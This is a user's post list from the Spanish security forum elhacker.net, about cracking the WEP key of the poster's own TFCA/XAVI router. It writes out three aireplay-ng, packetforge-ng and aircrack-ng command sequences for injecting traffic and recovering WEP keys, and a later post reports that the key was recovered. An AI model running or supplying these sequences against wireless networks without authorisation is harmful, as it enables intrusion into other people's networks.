elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Trabajando con las ramas de git (tercera parte)


  Mostrar Mensajes
Páginas: [1]
1  Seguridad Informática / Hacking Wireless / Re: 15.000.000 de datas IV`s y no consigo la key WEP router XAVI TFCA en: 29 Julio 2010, 19:17 pm
ME respondo a mi mismo, tras 2 dias de pruebas y 16 millones de datas obtenidos por ataque 2 y 3 expuesto anteriormente, hoy he logrado inyectar con el ataque 1 y por ende a los 40.000 datas ya la he conseguido.
2  Seguridad Informática / Hacking Wireless / Re: hacer hacking wireless desde una makina virtual en: 29 Julio 2010, 15:07 pm
Hola, con el VMWARE si tu tarjeta wifi es USB deberia aparecer el simbolo en gris en la parte baja de la derecha de la ventana del VMWARE, una vez localizas el icono le das para q lo desconecte del HOST y lo conecte al VMWARE y ahora ya podrás usarlo.

Lo digo pq yo tengo varias pcmcia y nunca me las detecta el vmware sin embargo las USB si...
3  Seguridad Informática / Hacking Wireless / 15.000.000 de datas IV`s y no consigo la key WEP router XAVI TFCA en: 29 Julio 2010, 15:02 pm
Hola a todos, lo primero de todo presentarme, ya que es mi primer post, aunque os llevo leyendo varias semanas.

Os queria plantear una duda que me ha surgido con la seguridad de mi red wireless, veamos si alguien me puede ayudar.

Hasta hace unas semanas tenia adsl con ya.com con un router smc, pues bien, este router al tenerlo con cifrado WEP de 128bits utilizando el backtrack sacaba la contraseña en 3 minutos sin problema alguno.

Ahora me he mudado a mi piso nuevo :) y he contratado con TFCA y me han dado un router XAVI, el cual con el cifrado WEP no consigo la clave de ninguna de las maneras... llevo 15.000.000 de datas en el segundo fichero.cap, porque en el primero ya logré 3,5M lo extraño es que al hacer el aircrack-ng ya no me hace la suma total, es decir no me aparecen los 15M del 01.cap + 3,5M del 02.cap...

No sé si me explico, en fin lo que os queria preguntar es si alguien tiene idea de por qué con tantos datas o iv`s no consigo la cave WEP de este router.

Basta decir que me autentico y Asocio al router sin problemas y que inyecto trafico de 3 maneras diferentes por si las moscas, aqui os las pongo:

1)
# aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) wlan0
# aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 wlan0
# aircrack-ng  

2)
# aireplay-ng -1 0 -a <bssid> -h <mac> -e <essid> wlan0
# aireplay-ng -2 -p 0841 -c ff:ff:ff:ff:ff:ff -h (mac) wlan0


3)
# aireplay-ng -1 0 -a <bssid> -h <mac> -e <essid> wlan0
# aireplay-ng -5 -b <BSSID> -h <mac> wlan0
# packetforge-ng -0 -a <BSSID> -h <mac> -k 255.255.255.255 -l 255.255.255.255 -y <archivo .xor> -w ARP
# aireplay-ng -2 -r ARP wlan0


SE OS OCURRE ALGO??
solo un apunte mas, con el modo de inyeccion 1, el router smc consigo la key en 2min, sin necesidad de otros metodos, pero con el xavi tengo q utilizar el modo 1 y 2 a la vez para q empieze a inyectar trafico y conseguir datas..
Páginas: [1]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines